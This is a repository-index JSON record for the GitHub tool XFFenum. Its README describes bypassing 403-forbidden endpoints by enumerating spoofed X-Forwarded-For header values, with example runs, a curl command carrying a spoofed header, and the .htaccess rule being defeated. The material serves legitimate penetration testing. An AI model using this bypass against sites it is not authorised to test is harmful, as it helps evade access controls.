{"id":13542409,"url":"https://github.com/vavkamil/XFFenum","last_synced_at":"2025-04-02T10:30:44.321Z","repository":{"id":108976992,"uuid":"198877291","full_name":"vavkamil/XFFenum","owner":"vavkamil","description":"X-Forwarded-For [403 forbidden] enumeration","archived":false,"fork":false,"pushed_at":"2024-05-03T19:47:14.000Z","size":6,"stargazers_count":88,"open_issues_count":2,"forks_count":27,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-11-03T08:33:31.637Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vavkamil.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":null,"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":["https://www.blockchain.com/btc/address/1Hx7eLzzUyAqM6k8d8AVffCVYeFv7b2sw7"]}},"created_at":"2019-07-25T17:48:20.000Z","updated_at":"2024-09-27T17:57:48.000Z","dependencies_parsed_at":"2024-08-01T10:16:23.940Z","dependency_job_id":null,"html_url":"https://github.com/vavkamil/XFFenum","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vavkamil%2FXFFenum","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vavkamil%2FXFFenum/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vavkamil%2FXFFenum/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vavkamil%2FXFFenum/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vavkamil","download_url":"https://codeload.github.com/vavkamil/XFFenum/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246796779,"owners_count":20835445,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T10:01:06.541Z","updated_at":"2025-04-02T10:30:44.025Z","avatar_url":"https://github.com/vavkamil.png","language":"Python","readme":"# XFFenum\n\nA simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header\n\nBased on the [enumXFF](https://github.com/infosec-au/enumXFF) by @infosec_au\n\n### Example\n\n```\nvavkamil@localhost:~/XFFenum$ python3 xffenum.py -u https://xss.vavkamil.cz/xff -i 192.168.0.0/16\n __  _______ _____                          \n \\ \\/ /  ___|  ___|__ _ __  _   _ _ __ ___  \n  \\  /| |_  | |_ / _ \\ '_ \\| | | | '_ ` _ \\ \n  /  \\|  _| |  _|  __/ | | | |_| | | | | | |\n /_/\\_\\_|   |_|  \\___|_| |_|\\__,_|_| |_| |_|\n X-Forwarded-For [403 forbidden] enumeration\n\n[i] Using URL: https://xss.vavkamil.cz/xff\n[i] Using IP range: 192.168.0.0/16\n[i] IP addresses in range: 65536\n[i] Iterations required: 13108 \n\n673it [00:34, 21.69it/s]\n\n[!] Access granted with 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41\n[!] curl https://xss.vavkamil.cz/xff -H \"X-Forwarded-For: 192.168.13.37, 192.168.13.38, 192.168.13.39, 192.168.13.40, 192.168.13.41\"\n```\n\n#### Proof of Concept\n\n```\nvavkamil@localhost:~$ curl -i https://xss.vavkamil.cz/xff\nHTTP/2 403 \ndate: Wed, 07 Aug 2019 20:02:41 GMT\ncontent-type: text/html; charset=iso-8859-1\nset-cookie: __cfduid=d77da0ad10e7a360cce4a28311784c12d1565208161; expires=Thu, 06-Aug-20 20:02:41 GMT; path=/; domain=.vavkamil.cz; HttpOnly; Secure\nexpect-ct: max-age=604800, report-uri=\"https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct\"\nserver: cloudflare\ncf-ray: 502bd9832d69c2db-FRA\n\n\u003c!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"\u003e\n\u003chtml\u003e\u003chead\u003e\n\u003ctitle\u003e403 Forbidden\u003c/title\u003e\n\u003c/head\u003e\u003cbody\u003e\n\u003ch1\u003eForbidden\u003c/h1\u003e\n\u003cp\u003eYou don't have permission to access /xff\non this server.\u003cbr /\u003e\n\u003c/p\u003e\n\u003chr\u003e\n\u003caddress\u003eApache/2.4.29 (Ubuntu) Server at xss.vavkamil.cz Port 80\u003c/address\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\n##### .htaccess\n\n```\nOrder Deny,Allow\nDeny from all\nSetEnvIf X-Forwarded-For \"192.168.13.37\" AllowAccess\nAllow from env=AllowAccess\n```\n\n### Usage\n\n```\nvavkamil@localhost:~/XFFenum$ python3 xffenum.py -h\n __  _______ _____                          \n \\ \\/ /  ___|  ___|__ _ __  _   _ _ __ ___  \n  \\  /| |_  | |_ / _ \\ '_ \\| | | | '_ ` _ \\ \n  /  \\|  _| |  _|  __/ | | | |_| | | | | | |\n /_/\\_\\_|   |_|  \\___|_| |_|\\__,_|_| |_| |_|\n X-Forwarded-For [403 forbidden] enumeration\n\nusage: xffenum.py [-h] -u URL -i IP_RANGE [-t THREADS] [--no-verify-ssl]\n\nX-Forwarded-For [403 forbidden] enumeration\n\noptional arguments:\n  -h, --help       show this help message and exit\n  -u URL           Forbidden URL patch to scan\n  -i IP_RANGE      Signe IP or range to use\n  -t THREADS       number of threads (default: 5)\n  --no-verify-ssl  Ignore any and all SSL errors.\n\nHave a nice day :)\n```\n\n## References\n\nhttps://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/  \nhttps://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html\n","funding_links":["https://www.blockchain.com/btc/address/1Hx7eLzzUyAqM6k8d8AVffCVYeFv7b2sw7"],"categories":["Miscellaneous"],"sub_categories":["Uncategorized"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvavkamil%2FXFFenum","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvavkamil%2FXFFenum","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvavkamil%2FXFFenum/lists"}